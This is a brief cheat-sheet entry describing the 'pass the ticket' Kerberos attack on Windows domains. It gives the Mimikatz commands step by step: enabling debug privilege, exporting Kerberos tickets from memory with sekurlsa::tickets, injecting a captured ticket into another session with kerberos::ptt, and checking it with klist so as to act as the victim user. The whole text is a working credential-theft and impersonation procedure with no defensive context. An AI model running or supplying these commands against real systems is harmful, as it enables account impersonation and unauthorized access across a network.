Pass the ticket

Generate a TGS ticket from authorized user session

• ./mimikatz.exe

• privilege::debug

• sekurlsa::tickets /export

• dir *.kirbi

Select any ticket and copy its name and send to unauthorized user’s session

• kerberos::ptt <ticket-name>

• klist to verify if session is generated or not

• now we can perform action on the behalf of another user whose ticket was captured